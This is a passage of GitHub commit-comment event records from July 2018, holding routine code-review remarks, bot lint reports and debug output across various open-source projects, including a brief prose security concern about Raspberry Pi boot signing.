else\r\n    echo \"${res:0:${#res}-3}\" > $file\r\n  fi\r\n\r\n  return $code\r\n}"}},"created_at":"2018-07-25T12:49:19Z"}
{"id":"8016253513","type":"CommitCommentEvent","actor":{"login":"chalasr"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29828442,"position":5,"line":40,"path":"Output/Output.php","commit_id":"ff2b2c5f4dedbf573d179d9e9e6254f3b3987026","created_at":"2018-07-25T12:49:44Z","updated_at":"2018-07-25T12:49:44Z","author_association":"MEMBER","body":"The component requires php >= 7.1.3 (https://github.com/symfony/console/blob/master/composer.json#L19)."}},"created_at":"2018-07-25T12:49:44Z"}
{"id":"8016253693","type":"CommitCommentEvent","actor":{"login":"agosiewska"},"repo":{"name":"MI2DataLab/survxai"},"payload":{"comment":{"id":29828444,"position":null,"line":null,"path":null,"commit_id":"41a81413071e49ff009e4d7b72bbeb80e07533cd","created_at":"2018-07-25T12:49:46Z","updated_at":"2018-07-25T12:49:46Z","author_association":"MEMBER","body":"#2 "}},"created_at":"2018-07-25T12:49:46Z"}
{"id":"8016254958","type":"CommitCommentEvent","actor":{"login":"itphuongmaneger"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828449,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T12:50:00Z","updated_at":"2018-07-25T12:50:00Z","author_association":"NONE","body":"GOOD"}},"created_at":"2018-07-25T12:50:00Z"}
{"id":"8016255572","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/OasisLMF"},"payload":{"comment":{"id":29828451,"position":null,"line":null,"path":null,"commit_id":"fcfe9ebed15e53caebdab0747ab4e434273625fb","created_at":"2018-07-25T12:50:07Z","updated_at":"2018-07-25T12:50:07Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add multi-peril and multi-coverage type support to oasislmf (new lookup framework + exposure manager)](https://trello.com/c/qrf45bZn/433-add-multi-peril-and-multi-coverage-type-support-to-oasislmf-new-lookup-framework-exposure-manager)"}},"created_at":"2018-07-25T12:50:07Z"}
{"id":"8016258865","type":"CommitCommentEvent","actor":{"login":"lucasalva87"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29828460,"position":9,"line":69,"path":"modules/smtp/actions.php","commit_id":"6315861a07e174984e5b81e07d3232505128b5c7","created_at":"2018-07-25T12:50:42Z","updated_at":"2018-07-25T12:50:42Z","author_association":"CONTRIBUTOR","body":"E' un controllo in più per verificare se l'oggetto $mail è stato istanziato"}},"created_at":"2018-07-25T12:50:42Z"}
{"id":"8016260542","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29828463,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-25T12:51:00Z","updated_at":"2018-07-25T12:51:00Z","author_association":"OWNER","body":"Все еще не компилируется,\r\n> static MyOutput myOut = myPrintln(); \r\nпишет что myPrintln(String) в MyOutput не может быть применена к         (), так же метод myPrintln() пришлось сделать статическим, так как поле myOut  является статическим и не может вызывать не статические методы"}},"created_at":"2018-07-25T12:51:00Z"}
{"id":"8016271177","type":"CommitCommentEvent","actor":{"login":"fancywriter"},"repo":{"name":"monix/monix-sample"},"payload":{"comment":{"id":29828480,"position":51,"line":49,"path":"client/src/main/scala/client/BackPressuredWebSocketClient.scala","commit_id":"23d5dda19dc05bacdccd5ef76139c1e5db1f87f9","created_at":"2018-07-25T12:52:57Z","updated_at":"2018-07-25T12:52:57Z","author_association":"NONE","body":"oh, right, haven't realise that it's scalajs"}},"created_at":"2018-07-25T12:52:57Z"}
{"id":"8016271358","type":"CommitCommentEvent","actor":{"login":"pimpmaneaton"},"repo":{"name":"ezio84/abc_frameworks_base"},"payload":{"comment":{"id":29828481,"position":null,"line":null,"path":null,"commit_id":"8c6ddb291fea393a7b1ca5c8b5ad0925bc1d2184","created_at":"2018-07-25T12:52:59Z","updated_at":"2018-07-25T12:52:59Z","author_association":"NONE","body":"@ezio84 with all the work that you have done for Ambient music and other features, are you able to still have the Now Playing feature still work. I have all your latest commits, and for the life of me I cannot get the Now Playing to show on the Always On display for the Pixel 2, like it does on stock."}},"created_at":"2018-07-25T12:52:59Z"}
{"id":"8016272304","type":"CommitCommentEvent","actor":{"login":"dgaubert"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":29828488,"position":7,"line":2342,"path":"test/acceptance/aggregation.js","commit_id":"a858d67cae0d956a882bcc25acd45d23485522a7","created_at":"2018-07-25T12:53:09Z","updated_at":"2018-07-25T12:53:09Z","author_association":"CONTRIBUTOR","body":"😱 "}},"created_at":"2018-07-25T12:53:09Z"}
{"id":"8016273037","type":"CommitCommentEvent","actor":{"login":"nvipash"},"repo":{"name":"nvipash/themoviedb-reactapp"},"payload":{"comment":{"id":29828490,"position":null,"line":null,"path":null,"commit_id":"3a757c57c29cdc1ca3eb16ad16aac67f0c79ad07","created_at":"2018-07-25T12:53:17Z","updated_at":"2018-07-25T12:53:17Z","author_association":"OWNER","body":"@ovovchak all fixed in this [commit](https://github.com/nvipash/themoviedb-reactapp/commit/021311f2b9bfaf85806c7302ed134b5be6c14faf)"}},"created_at":"2018-07-25T12:53:17Z"}
{"id":"8016275953","type":"CommitCommentEvent","actor":{"login":"aaronlf-SF"},"repo":{"name":"aaronlf-SF/Caliber-Data-Entry-Optimisation"},"payload":{"comment":{"id":29828499,"position":null,"line":null,"path":null,"commit_id":"85a6829620abdd02df46563a7753c410c6e17713","created_at":"2018-07-25T12:53:48Z","updated_at":"2018-07-25T12:53:48Z","author_association":"OWNER","body":"v.1.0.3 not 1.0.2"}},"created_at":"2018-07-25T12:53:48Z"}
{"id":"8016282601","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828511,"position":null,"line":null,"path":null,"commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T12:55:00Z","updated_at":"2018-07-25T12:55:00Z","author_association":"NONE","body":"что-то не все работает так, как нужно )\r\n```\r\n$ ruby main.rb \r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n0\r\n_________\r\nALmaty\r\nAstana\r\nВведите название станции:\r\nAstana\r\nСтанция Astana создано\r\n_________________\r\nВыберите пункт из списка:\r\n0.Добавить станцию\r\n1.Добавить поезд\r\n2.Добавить вагон\r\n3.Управление маршрутом\r\n4.Назначить маршрут поезду\r\n5.Добавить вагон к поезду\r\n6.Отцепить вагон от поезда\r\n7.Перемеcтить поезд по маршруту\r\n8.Просмотреть список станций\r\n9.список поездов на станции\r\n10.Для выхода из программы\r\n0\r\n_________\r\nALmaty\r\nAstana\r\nAstana\r\n```"}},"created_at":"2018-07-25T12:55:00Z"}
{"id":"8016284396","type":"CommitCommentEvent","actor":{"login":"ds21h"},"repo":{"name":"ds21h/ESP8266-Switch"},"payload":{"comment":{"id":29828515,"position":null,"line":null,"path":null,"commit_id":"714846e69683af52de527a3e8b967f6694b1074e","created_at":"2018-07-25T12:55:19Z","updated_at":"2018-07-25T12:55:19Z","author_association":"OWNER","body":"Version 2.1"}},"created_at":"2018-07-25T12:55:19Z"}
{"id":"8016289638","type":"CommitCommentEvent","actor":{"login":"Gospodchikovs"},"repo":{"name":"lessworks/translation"},"payload":{"comment":{"id":29828524,"position":17,"line":17,"path":"principles/index.ru.md","commit_id":"023fdc0212ca446a9c033dd75a8cc9a3713244dd","created_at":"2018-07-25T12:56:18Z","updated_at":"2018-07-25T12:56:18Z","author_association":"CONTRIBUTOR","body":"Некритично, но я бы указал русскую версию манифеста, она есть там же. http://agilemanifesto.org/iso/ru/manifesto.html вместо http://www.agilemanifesto.org/"}},"created_at":"2018-07-25T12:56:18Z"}
{"id":"8016289763","type":"CommitCommentEvent","actor":{"login":"sevrino"},"repo":{"name":"sevrino/Computer_developer"},"payload":{"comment":{"id":29828525,"position":null,"line":null,"path":null,"commit_id":"64173c6e6690c0879a26403dc8d24fd0110861ed","created_at":"2018-07-25T12:56:19Z","updated_at":"2018-07-25T12:56:19Z","author_association":"OWNER","body":"loll backed"}},"created_at":"2018-07-25T12:56:19Z"}
{"id":"8016301002","type":"CommitCommentEvent","actor":{"login":"KirnW"},"repo":{"name":"ZeChrales/PogoAssets"},"payload":{"comment":{"id":29828538,"position":null,"line":null,"path":null,"commit_id":"40d190f2c1ce8093674fc718280aca7cf820c128","created_at":"2018-07-25T12:58:24Z","updated_at":"2018-07-25T12:58:24Z","author_association":"NONE","body":"Nice. Was the coding for \"Switch to manual input\" for Pokestops always there? "}},"created_at":"2018-07-25T12:58:24Z"}
{"id":"8016306278","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828547,"position":null,"line":null,"path":null,"commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T12:59:19Z","updated_at":"2018-07-25T12:59:19Z","author_association":"NONE","body":"ТЗ: \"Релизовать проверку на формат номера поезда. Допустимый формат: три буквы или цифры в любом порядке, необязательный дефис (может быть, а может нет) и еще 2 буквы или цифры после дефиса.\"\r\nвот это не совсем правильное поведение:\r\n```\r\n1\r\n_________\r\nqqq-11\r\nwww-11\r\nВведите номер поезда:\r\n_____\r\nВыберите тип:  1.Пассажирский  2.Грузовой!\r\n1\r\nПассажирский поезд _____\r\n создан\r\n```\r\nпрограмма создает поезд номер которого состоит из \"андерскоров\", что не соответствует заданию\r\nнужно поправить регулярное выражение"}},"created_at":"2018-07-25T12:59:19Z"}
{"id":"8016310176","type":"CommitCommentEvent","actor":{"login":"s982m0414"},"repo":{"name":"vdkd888/droneproject"},"payload":{"comment":{"id":29828556,"position":null,"line":null,"path":null,"commit_id":"e4c7fa24f1c288f56781f71fe5c834534b028746","created_at":"2018-07-25T13:00:01Z","updated_at":"2018-07-25T13:00:01Z","author_association":"NONE","body":"Hi! I am beginner to the ar drone and node.js. I followed the steps.However, it returns an error message when I paste Command Script. It said \"Error: Cannot find module 'simple-debug' \".\r\n\r\nCan you show me how to do the step:\r\nCopy the ar-drone library by felixge and paste the folder in cd data/video the same way you did node\r\n \r\nI'm wondering maybe I did something wrong on this steps.\r\nThanks a lot!!"}},"created_at":"2018-07-25T13:00:01Z"}
{"id":"8016311507","type":"CommitCommentEvent","actor":{"login":"elliotcm"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29828562,"position":19,"line":19,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T13:00:15Z","updated_at":"2018-07-25T13:00:15Z","author_association":"NONE","body":"Not a bad idea, though you wouldn't be able to use it to check production post-update."}},"created_at":"2018-07-25T13:00:15Z"}
{"id":"8016312225","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29828568,"position":null,"line":null,"path":null,"commit_id":"fd760d9f732fdd84aa99033f40bfc8ad564aa3dd","created_at":"2018-07-25T13:00:21Z","updated_at":"2018-07-25T13:00:21Z","author_association":"COLLABORATOR","body":"Comment on fd760d9f732fdd84aa99033f40bfc8ad564aa3dd.\n\nThere are 13 results for the section autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | tests/processes/ProcessingTest.py | 86 |\n| The code does not comply to PEP8. | tests/processes/ProcessingTest.py | 555 |\n| E501 line too long (84 > 80 characters) | tests/processes/ProcessingTest.py | 86 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 87 |\n| E231 missing whitespace after ',' | tests/processes/ProcessingTest.py | 88 |\n| E501 line too long (81 > 80 characters) | tests/processes/ProcessingTest.py | 88 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 89 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 90 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 91 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 92 |\n| E501 line too long (85 > 80 characters) | tests/processes/ProcessingTest.py | 93 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 94 |\n| E501 line too long (81 > 80 characters) | tests/processes/ProcessingTest.py | 555 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-25T13:00:21Z"}
{"id":"8016317292","type":"CommitCommentEvent","actor":{"login":"vforteli"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29828580,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-25T13:01:15Z","updated_at":"2018-07-25T13:01:15Z","author_association":"OWNER","body":"Actually I think I will create an overload that takes an IPNetwork(IPAddress, Int32) object. Some care probably needs to be taken to make sure they are not overlapping if multiple are added"}},"created_at":"2018-07-25T13:01:15Z"}
{"id":"8016318313","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29828584,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:01:26Z","updated_at":"2018-07-25T13:01:26Z","author_association":"NONE","body":"closest I can find is a BMD_Film_to_Cinelog-C cube...\r\n\r\nI know Cinelog-C is close/based to/on Cineon, so don't know if we can amend that current profile with Andy's numbers?\r\n\r\n[[TRANSFORM]_BMD_Film_to_Cinelog-C.cube.zip](https://github.com/ilia3101/MLV-App/files/2227957/TRANSFORM._BMD_Film_to_Cinelog-C.cube.zip)\r\n"}},"created_at":"2018-07-25T13:01:26Z"}
{"id":"8016325168","type":"CommitCommentEvent","actor":{"login":"damjanZG"},"repo":{"name":"funneld/XiaomiYi"},"payload":{"comment":{"id":29828596,"position":null,"line":null,"path":null,"commit_id":"0cfbadc832a2be3cba3fdb5abdf852abaa271068","created_at":"2018-07-25T13:02:36Z","updated_at":"2018-07-25T13:02:36Z","author_association":"NONE","body":"Is this possible to do with HDMI out? Default is 1080i."}},"created_at":"2018-07-25T13:02:36Z"}
{"id":"8016327514","type":"CommitCommentEvent","actor":{"login":"Gospodchikovs"},"repo":{"name":"lessworks/translation"},"payload":{"comment":{"id":29828601,"position":null,"line":null,"path":null,"commit_id":"023fdc0212ca446a9c033dd75a8cc9a3713244dd","created_at":"2018-07-25T13:03:01Z","updated_at":"2018-07-25T13:03:01Z","author_association":"CONTRIBUTOR","body":"Откомментировал"}},"created_at":"2018-07-25T13:03:01Z"}
{"id":"8016327952","type":"CommitCommentEvent","actor":{"login":"paulbrands1991"},"repo":{"name":"EMATech/autopower"},"payload":{"comment":{"id":29828602,"position":null,"line":null,"path":null,"commit_id":"b26d0f22bfdead61c984d996ac60caa2acfcb994","created_at":"2018-07-25T13:03:06Z","updated_at":"2018-07-25T13:03:06Z","author_association":"NONE","body":"Just what I needed.. I’m looking to switch my eaton poweroutlets to the on state when the main supply fails. And than switch them off when the main supply gets back.\r\n\r\nWhat is your advice ?\r\nWith regards, Paul"}},"created_at":"2018-07-25T13:03:06Z"}
{"id":"8016328195","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828603,"position":null,"line":null,"path":null,"commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T13:03:08Z","updated_at":"2018-07-25T13:03:08Z","author_association":"NONE","body":"ну и лучше все-таки константу определять не в глобальном скоупе, а в том классе/модуле, где она используется"}},"created_at":"2018-07-25T13:03:08Z"}
{"id":"8016330512","type":"CommitCommentEvent","actor":{"login":"leleuj"},"repo":{"name":"pac4j/play-pac4j"},"payload":{"comment":{"id":29828606,"position":68,"line":68,"path":"shared/src/main/java/org/pac4j/play/store/PlayCookieStore.java","commit_id":"05b057e38c6947fd537978e23dd12987ddfdd0a3","created_at":"2018-07-25T13:03:32Z","updated_at":"2018-07-25T13:03:32Z","author_association":"MEMBER","body":"Yes, this is an issue with this implementation. Encryption or not, we are\nstill limited by the size of the cookie and it may cause issues depending\non the data you want to keep in your profiles...\n\nOn Wed, Jul 25, 2018 at 2:47 PM, Ivan Suhinin <notifications@github.com>\nwrote:\n\n> Crap, undoing this makes cookie size above 10k while only 4k is available.\n> Anyway, default logout scenario does not work with current implementation :\\\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pac4j/play-pac4j/commit/05b057e38c6947fd537978e23dd12987ddfdd0a3#commitcomment-29828415>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA_YrKR8uu4TIdUKw7lxH-jknbLveu42ks5uKGjNgaJpZM4Vf-TR>\n> .\n>\n"}},"created_at":"2018-07-25T13:03:32Z"}
{"id":"8016331687","type":"CommitCommentEvent","actor":{"login":"alexsegura"},"repo":{"name":"coopcycle/coopcycle-web"},"payload":{"comment":{"id":29828611,"position":null,"line":null,"path":null,"commit_id":"cbf1f38d5fed335b8ac50bd534ab06f883082287","created_at":"2018-07-25T13:03:45Z","updated_at":"2018-07-25T13:03:45Z","author_association":"MEMBER","body":"This is ok for a \"quick & dirty\" fix, but we need something more complex IMHO. \r\nLike, storing the last timestamp in Redis, and/or a key that expires in Redis, something like that... no easy though. "}},"created_at":"2018-07-25T13:03:45Z"}
{"id":"8016335617","type":"CommitCommentEvent","actor":{"login":"scarvalhojr"},"repo":{"name":"vasyl-purchel/rsyslog"},"payload":{"comment":{"id":29828620,"position":null,"line":null,"path":null,"commit_id":"46c14e153af0bb9749d7e23b26f21831fc400c30","created_at":"2018-07-25T13:04:27Z","updated_at":"2018-07-25T13:04:27Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-25T13:04:27Z"}
{"id":"8016340548","type":"CommitCommentEvent","actor":{"login":"oliv3r"},"repo":{"name":"Ultimaker/um-rootfs_debian_armhf"},"payload":{"comment":{"id":29828631,"position":25,"line":16,"path":"tests/buildenv.sh","commit_id":"93370f8b570c971fe500c873fd55bd3b72a0a3ce","created_at":"2018-07-25T13:05:21Z","updated_at":"2018-07-25T13:05:21Z","author_association":"CONTRIBUTOR","body":"i don't think we need to check for debootstrap twice :p"}},"created_at":"2018-07-25T13:05:21Z"}
{"id":"8016342035","type":"CommitCommentEvent","actor":{"login":"suhinini"},"repo":{"name":"pac4j/play-pac4j"},"payload":{"comment":{"id":29828632,"position":68,"line":68,"path":"shared/src/main/java/org/pac4j/play/store/PlayCookieStore.java","commit_id":"05b057e38c6947fd537978e23dd12987ddfdd0a3","created_at":"2018-07-25T13:05:37Z","updated_at":"2018-07-25T13:05:37Z","author_association":"CONTRIBUTOR","body":"For now I'll use a custom logout url builder that uses a generic logout url without idToken but that's a hack. So much for keeping it all stateless on server-side :\\"}},"created_at":"2018-07-25T13:05:37Z"}
{"id":"8016343931","type":"CommitCommentEvent","actor":{"login":"oliv3r"},"repo":{"name":"Ultimaker/um-rootfs_debian_armhf"},"payload":{"comment":{"id":29828634,"position":8,"line":9,"path":"tests/buildenv.sh","commit_id":"93370f8b570c971fe500c873fd55bd3b72a0a3ce","created_at":"2018-07-25T13:05:58Z","updated_at":"2018-07-25T13:05:58Z","author_association":"CONTRIBUTOR","body":"turns out, local isn't posix compatible :S #learn something each day"}},"created_at":"2018-07-25T13:05:58Z"}
{"id":"8016347035","type":"CommitCommentEvent","actor":{"login":"maic66"},"repo":{"name":"pingencom/pingen"},"payload":{"comment":{"id":29828638,"position":null,"line":null,"path":null,"commit_id":"799734311ffd94011f1d6dddaaa0a4435c9557b0","created_at":"2018-07-25T13:06:34Z","updated_at":"2018-07-25T13:06:34Z","author_association":"NONE","body":"I had to correct this way with php 7.2 (don't know with previous versions)\r\n\r\n`if (isset($aData['data']) && (!is_array(json_decode($aData['data'], true)) || !count(json_decode($aData['data'], true))))`\r\n"}},"created_at":"2018-07-25T13:06:34Z"}
{"id":"8016347289","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29828640,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T13:06:37Z","updated_at":"2018-07-25T13:06:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T13:06:37Z"}
{"id":"8016353417","type":"CommitCommentEvent","actor":{"login":"av0r0nin"},"repo":{"name":"lessworks/translation"},"payload":{"comment":{"id":29828652,"position":null,"line":null,"path":null,"commit_id":"023fdc0212ca446a9c033dd75a8cc9a3713244dd","created_at":"2018-07-25T13:07:43Z","updated_at":"2018-07-25T13:07:43Z","author_association":"CONTRIBUTOR","body":"Ага, поправил. Спасибо. Добавил тебя в соавторы.\r\n\r\n25 июля 2018 г., в 16:03, Sergey Gospodchikov <notifications@github.com<mailto:notifications@github.com>> написал(а):\r\n\r\n\r\nОткомментировал\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/lessworks/translation/commit/023fdc0212ca446a9c033dd75a8cc9a3713244dd#commitcomment-29828601>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AcdEvwsZe-IG6pHf0j41W8m_BhUMfdo8ks5uKGyFgaJpZM4VgCDz>.\r\n\r\n"}},"created_at":"2018-07-25T13:07:43Z"}
{"id":"8016357349","type":"CommitCommentEvent","actor":{"login":"oliv3r"},"repo":{"name":"Ultimaker/um-rootfs_debian_armhf"},"payload":{"comment":{"id":29828656,"position":30,"line":21,"path":"tests/buildenv.sh","commit_id":"93370f8b570c971fe500c873fd55bd3b72a0a3ce","created_at":"2018-07-25T13:08:25Z","updated_at":"2018-07-25T13:08:25Z","author_association":"CONTRIBUTOR","body":"i didn't notice/realize this before, but the buildenv.sh script is supposed to check the build environment, e.g. the package generation env. So unless debootstrap needs touch, chroot and mkfs.ext4, we are testing the actual image requirements in our build env."}},"created_at":"2018-07-25T13:08:25Z"}
{"id":"8016360290","type":"CommitCommentEvent","actor":{"login":"oraclepeng"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828660,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T13:08:57Z","updated_at":"2018-07-25T13:08:57Z","author_association":"NONE","body":"like it"}},"created_at":"2018-07-25T13:08:57Z"}
{"id":"8016363123","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828661,"position":5,"line":12,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/route.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T13:09:27Z","updated_at":"2018-07-25T13:09:27Z","author_association":"NONE","body":"не очень верно сначала \"регистрировать инстанс\" , а потом уже его валидировать\r\nзачем регистрировать невалидный объект, который не будет создан в итоге"}},"created_at":"2018-07-25T13:09:27Z"}
{"id":"8016366082","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29828666,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T13:09:59Z","updated_at":"2018-07-25T13:09:59Z","author_association":"COLLABORATOR","body":"This is our implementation of Cineon:\r\n`double CineonLogTonemap(double x) { return ((log10(x * (1.0 - 0.0108) + 0.0108)) * 300.0 + 685.0) / 1023.0; }`"}},"created_at":"2018-07-25T13:09:59Z"}
{"id":"8016367497","type":"CommitCommentEvent","actor":{"login":"satmandu"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29828672,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-25T13:10:14Z","updated_at":"2018-07-25T13:10:14Z","author_association":"NONE","body":"Since the RPi is being used more and more in industrial uses, I do worry that the lack of security may at some point be a concern.\r\n\r\nThe system not requiring bootcode.bin to be signed by default for instance is a concern, no?\r\n\r\nOne attack method:\r\n1. Remove or move existing bootcode.bin on sdcard (or just corrupt that fat partition/ mark it as EFI Boot, etc.)\r\n2. Make malicious bootcode.bin available via dhcp/tftp on local network or on local usb mass storage.\r\n3. Trigger conditions to make RPi system want to shut down (or force a power cycle via crash) causing the bootloader to search for a bootcode.bin which can be read.\r\n"}},"created_at":"2018-07-25T13:10:14Z"}
{"id":"8016367947","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828676,"position":5,"line":15,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/station.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T13:10:18Z","updated_at":"2018-07-25T13:10:18Z","author_association":"NONE","body":"здесь то же самое, что выше\r\nты в 13 строке добавляешь объект в массив, далее его регистрируешь и только потом проверяешь\r\nэто неверно"}},"created_at":"2018-07-25T13:10:18Z"}
{"id":"8016368705","type":"CommitCommentEvent","actor":{"login":"tamurashingo"},"repo":{"name":"tamurashingo/dexador"},"payload":{"comment":{"id":29828677,"position":null,"line":null,"path":null,"commit_id":"72907d2ad6370733dbbac4c33b2ecdd8fb1e01b5","created_at":"2018-07-25T13:10:27Z","updated_at":"2018-07-25T13:10:27Z","author_association":"OWNER","body":"## no proxy auth, no HTTPS\r\n\r\n```\r\n(dex:get \"http://www.sbcl.org\" :verbose T)\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET / HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.sbcl.org\r\nAccept: */*\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n\r\n## proxy, no HTTPS\r\n\r\n```\r\n(dex:get \"http://www.sbcl.org\" :proxy \"http://localhost:3128\" :verbose T)\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET http://www.sbcl.org HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.sbcl.org\r\nAccept: */*\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n\r\n## proxy auth, no HTTPS\r\n\r\n```\r\n(dex:get \"http://www.sbcl.org\" :proxy \"http://testuser:testpass@localhost:3128\" :verbose T)\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET http://www.sbcl.org HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.sbcl.org\r\nAccept: */*\r\nProxy-Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n\r\n## no proxy, HTTPS\r\n\r\n```\r\n(dex:get \"https://www.google.com\" :verbose T)\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET / HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.google.com\r\nAccept: */*\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n\r\n## proxy, HTTPS\r\n\r\n```\r\n(dex:get \"https://www.google.com\" :proxy \"http://localhost:3128\" :verbose T)\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nGET https://www.google.com HTTP/1.1\r\nUser-Agent: Dexador/0.9.10 (SBCL 1.4.9); Linux; 2.6.32-431.3.1.el6.x86_64\r\nHost: www.google.com\r\nAccept: */*\r\n\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n```\r\n\r\n## proxy 